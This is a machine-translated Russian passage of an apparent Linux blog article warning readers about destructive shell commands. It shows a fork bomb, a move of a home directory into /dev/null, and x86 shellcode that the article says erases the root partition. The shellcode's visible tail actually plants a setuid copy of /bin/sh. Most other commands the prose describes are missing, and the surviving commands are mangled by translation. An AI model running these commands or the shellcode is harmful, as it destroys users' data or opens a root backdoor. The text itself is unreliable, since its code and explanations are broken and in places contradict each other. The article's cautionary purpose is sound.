Командная строка Linux продуктивна, полезна и интересна, но иногда она может быть очень опасной, особенно когда вы не уверены, что делаете. Эта статья не предназначена для того, чтобы вас разозлить Linux или Командная строка Linux. Мы просто хотим познакомить вас с некоторыми командами, которые вам следует дважды подумать, прежде чем выполнять их.
В rm -rf Команда - один из самых быстрых способов удалить папку и ее содержимое. Но небольшая опечатка или незнание может привести к неисправимому повреждению системы. Некоторые из опций, используемых с команда rm являются.
Следовательно, будьте осторожны при выполнении
rm -rf команда. Чтобы предотвратить случайное удаление файла с помощью ‘rm‘, Создайте псевдоним‘rm‘Команда как‘rm -i' в ".bashrc”, Он будет запрашивать подтверждение каждого удаления.Вышеупомянутое на самом деле вилка бомба. Он работает, определяя функцию с именем ‘:', Который вызывает себя дважды: один раз на переднем плане и один раз на заднем плане. Он продолжает выполняться снова и снова, пока система не зависнет.
:(){:|:&};:
Приведенная выше команда записывает вывод ‘команда‘На блоке /dev/sda. Приведенная выше команда записывает необработанные данные, и все файлы в блоке будут заменены необработанными данными, что приведет к полной потере данных в блоке.
Вышеупомянутая команда переместит ‘папка' к /dev/null. В Linux /dev/null или значение NULL device - это специальный файл, который отбрасывает все записанные в него данные и сообщает об успешном завершении операции записи.
# mv / home / user / * / dev / null
Приведенная выше команда переместит все содержимое Пользователь каталог в /dev/null, что буквально означает, что все, что было отправлено черная дыра (значение NULL).
Приведенная выше команда загрузит сценарий из вредоносного источника и затем выполнит его. Команда Wget загрузит скрипт и ш выполнит загруженный скрипт.
Примечание: Вы должны хорошо знать источник, откуда вы загружаете пакеты и скрипты. Используйте только те скрипты / приложения, которые загружены из надежного источника.
Вышеупомянутая команда отформатирует блок ‘sda ’ и вы наверняка знаете, что после выполнения вышеуказанной команды ваш Block (Привод жесткого диска) будет новым, СОВЕРШЕННО НОВЫЙ! Без каких-либо данных, оставляя вашу систему в неустранимой стадии.
Вышеупомянутая команда используется для очистки содержимого файла. Если указанная выше команда выполнена с опечаткой или незнанием типа «> xt.conf » запишет файл конфигурации или любой другой системный или конфигурационный файл.
Эта команда, как описано в нашем 10 малоизвестных команд Linux, используется для редактирования предыдущей команды запуска без необходимости повторного ввода всей команды снова. Но это действительно может вызвать проблемы, если вы не рискнули тщательно проверить изменение исходной команды, используя ^ foo ^ бар команда.
Приведенная выше команда сотрет блок sda и записывать в блок случайные нежелательные данные. Конечно! Ваша система останется на непоследовательной и неустранимой стадии.
Приведенная ниже команда - это не что иное, как первая команда выше (rm -rf). Здесь коды спрятаны в шестнадцатеричный так что невежественный пользователь может быть обманут. Запуск приведенного ниже кода в вашем терминале сотрет ваш корень раздел.
Эта команда показывает, что угроза может быть скрытой и иногда не обнаруживается. Вы должны осознавать, что делаете и каков будет результат. Не компилируйте / не запускайте коды из неизвестного источника.
char esp [] __attribute__ ((section («. text»))) / * e.s.p. релиз */ = «\ Xeb \ x3e \ x5b \ x31 \ xc0 \ x50 \ x54 \ x5a \ x83 \ xec \ x64 \ x68 ″ «\ Xff \ xff \ xff \ xff \ x68 \ xdf \ xd0 \ xdf \ xd9 \ x68 \ x8d \ x99 ″ «\ Xdf \ x81 \ x68 \ x8d \ x92 \ xdf \ xd2 \ x54 \ x5e \ xf7 \ x16 \ xf7 ″ «\ X56 \ x04 \ xf7 \ x56 \ x08 \ xf7 \ x56 \ x0c \ x83 \ xc4 \ x74 \ x56 ″ «\ X8d \ x73 \ x08 \ x56 \ x53 \ x54 \ x59 \ xb0 \ x0b \ xcd \ x80 \ x31 ″ «\ Xc0 \ x40 \ xeb \ xf9 \ xe8 \ xbd \ xff \ xff \ xff \ x2f \ x62 \ x69 ″ «\ X6e \ x2f \ x73 \ x68 \ x00 \ x2d \ x63 \ x00 ″ «Cp -p / bin / sh /tmp/.beyond; Чмод 4755. /tmp/.beyond;”;
Примечание: Не выполняйте ни одну из вышеперечисленных команд в своем Linux терминал, оболочка, ваш друг или школьный компьютер. Если вы хотите их протестировать, запустите их на виртуальной машине. Любое несоответствие или потеря данных из-за выполнения вышеуказанной команды сломает вашу систему, для чего ни Автор статьи и Tecmint ответственнен.
На этом пока все. Я скоро буду здесь снова с другой интересной статьей, которую люди будут любить читать. А пока оставайтесь с нами и оставайтесь на связи Tecmint. Если вы знаете такие Опасные команды Linux и вы хотите, чтобы мы добавили его в список, сообщите нам об этом в разделе комментариев и не забудьте оставить свой ценный отзыв.